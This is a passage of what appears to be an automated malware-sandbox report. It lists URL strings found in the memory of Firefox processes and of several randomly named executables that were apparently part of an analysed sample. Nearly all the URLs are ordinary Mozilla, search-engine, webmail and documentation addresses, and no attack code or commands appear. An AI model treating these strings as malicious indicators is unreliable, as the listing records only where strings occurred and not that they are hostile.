Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: c1b0009d40.exe, 00000009.00000003.2893540580.000000000134C000.00000004.00000020.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2877011760.000000000134C000.00000004.00000020.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2889639076.000000000134C000.00000004.00000020.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2906776140.000000000134C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?versio
Source: firefox.exe, 0000001A.00000002.3181290798.000002592F0AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3161526093.0000021CD9AC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3158958475.0000023D455E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: firefox.exe, 0000001A.00000002.3181290798.000002592F0AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3161526093.0000021CD9AC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3158958475.0000023D455E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: firefox.exe, 0000001A.00000003.3090406291.0000025934B81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180Required
Source: firefox.exe, 0000001A.00000003.3072690944.000002593B88E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 0000001A.00000003.3072690944.000002593B88E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 0000001A.00000003.3072690944.000002593B88E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 0000001A.00000003.3072690944.000002593B88E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: file.exe, 00000000.00000003.2114591297.0000000006168000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2114812044.0000000006168000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2114537427.000000000616B000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2820701412.0000000005C83000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2820622416.0000000005C86000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2821001734.0000000005C83000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2938700152.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2939218924.0000000005A96000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2938814641.0000000005A96000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3051345571.0000000005E68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2114591297.0000000006168000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2114812044.0000000006168000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2114537427.000000000616B000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2820701412.0000000005C83000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2820622416.0000000005C86000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2821001734.0000000005C83000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2938700152.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2939218924.0000000005A96000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2938814641.0000000005A96000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3051345571.0000000005E68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2114591297.0000000006168000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2114812044.0000000006168000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2114537427.000000000616B000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2820701412.0000000005C83000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2820622416.0000000005C86000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2821001734.0000000005C83000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2938700152.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2939218924.0000000005A96000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2938814641.0000000005A96000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3051345571.0000000005E68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2995425549.0000025933800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2995881145.0000025933A38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2996104229.0000025933A53000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2995647745.0000025933A1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001A.00000003.3079779963.00000259355C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3186609548.000002592FA08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: firefox.exe, 0000001A.00000002.3181290798.000002592F0AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3161526093.0000021CD9AC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3158958475.0000023D455E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001A.00000002.3181290798.000002592F0AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3161526093.0000021CD9AC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3158958475.0000023D455E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 0000001A.00000003.3095834333.0000025934AE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3072690944.000002593B8DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001A.00000002.3176703968.0000025923930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3176703968.0000025923911000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 0000001A.00000003.3061871345.000002593B92B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsARE
Source: firefox.exe, 0000001A.00000002.3183561232.000002592F1DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored
Source: firefox.exe, 0000001A.00000003.3061871345.000002593B92B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 0000001A.00000003.3061871345.000002593B92B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 0000001A.00000003.3061871345.000002593B92B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: 7a5878ed96.exe, 0000000A.00000003.2870739086.0000000004DEB000.00000004.00001000.00020000.00000000.sdmp, 7a5878ed96.exe, 0000000A.00000002.2911715801.00000000005EC000.00000040.00000001.01000000.0000000F.sdmp, num.exe, 0000001D.00000000.3018577142.00000000001BC000.00000008.00000001.01000000.00000017.sdmp, 7a5878ed96.exe, 0000001F.00000003.3079747725.000000000502B000.00000004.00001000.00020000.00000000.sdmp, 7a5878ed96.exe, 0000001F.00000002.3169928437.00000000005EC000.00000040.00000001.01000000.0000000F.sdmp, num[1].exe.8.dr String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: firefox.exe, 0000001A.00000003.2996313213.0000025933A6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2995425549.0000025933800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2995881145.0000025933A38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2996104229.0000025933A53000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2995647745.0000025933A1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000003.2114591297.0000000006168000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2114812044.0000000006168000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2114537427.000000000616B000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2820701412.0000000005C83000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2820622416.0000000005C86000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2821001734.0000000005C83000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2938700152.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2939218924.0000000005A96000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2938814641.0000000005A96000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3051345571.0000000005E68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2114591297.0000000006168000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2114812044.0000000006168000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2114537427.000000000616B000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2820701412.0000000005C83000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2820622416.0000000005C86000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2821001734.0000000005C83000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2938700152.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2939218924.0000000005A96000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2938814641.0000000005A96000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3051345571.0000000005E68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2114591297.0000000006168000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2114812044.0000000006168000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2114537427.000000000616B000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2820701412.0000000005C83000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2820622416.0000000005C86000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2821001734.0000000005C83000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2938700152.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2939218924.0000000005A96000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2938814641.0000000005A96000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3051345571.0000000005E68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001A.00000003.3099152165.0000025935B67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 0000001A.00000002.3185612064.000002592F67D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.inbox.lv/compose?to=%sgecko.handlerService.d
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%sbrowser.download.viewableInternally.typeWasRegiste
Source: firefox.exe, 0000001E.00000002.3158958475.0000023D45512000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001A.00000003.3111017875.000002593BFDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3106778667.000002593BFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3111017875.000002593BFF7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1Script
Source: firefox.exe, 0000001A.00000002.3176703968.0000025923991000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001A.00000002.3176703968.0000025923991000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.comX
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001E.00000002.3158958475.0000023D45512000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001E.00000002.3158958475.0000023D455C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 0000001E.00000002.3158958475.0000023D455C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3158958475.0000023D4552F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001E.00000002.3158958475.0000023D455C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001E.00000002.3158958475.0000023D455C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 0000001A.00000003.3061871345.000002593B92B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 0000001A.00000003.3061871345.000002593B92B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 0000001A.00000003.3061871345.000002593B92B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 0000001A.00000003.2996313213.0000025933A6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2995425549.0000025933800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2995881145.0000025933A38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2996104229.0000025933A53000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2995647745.0000025933A1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshotsresource://gre/modules/ExtensionDNR.sys.mjs
Source: firefox.exe, 0000001A.00000003.3072690944.000002593B88E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 0000001A.00000003.3072690944.000002593B88E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 0000001A.00000003.3072690944.000002593B88E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001A.00000002.3176703968.0000025923911000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881.browser
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 0000001E.00000002.3158958475.0000023D455E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001A.00000003.3153782991.000002593D8DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3158958475.0000023D455BB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001A.00000003.3061871345.000002593B92B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 0000001A.00000003.3099152165.0000025935B67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 0000001A.00000003.3061871345.000002593B92B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 0000001A.00000003.3061871345.000002593B92B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 0000001A.00000003.3061871345.000002593B92B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%wakeupBackground
Source: firefox.exe, 0000001A.00000003.3090406291.0000025934B81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3186609548.000002592FAC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
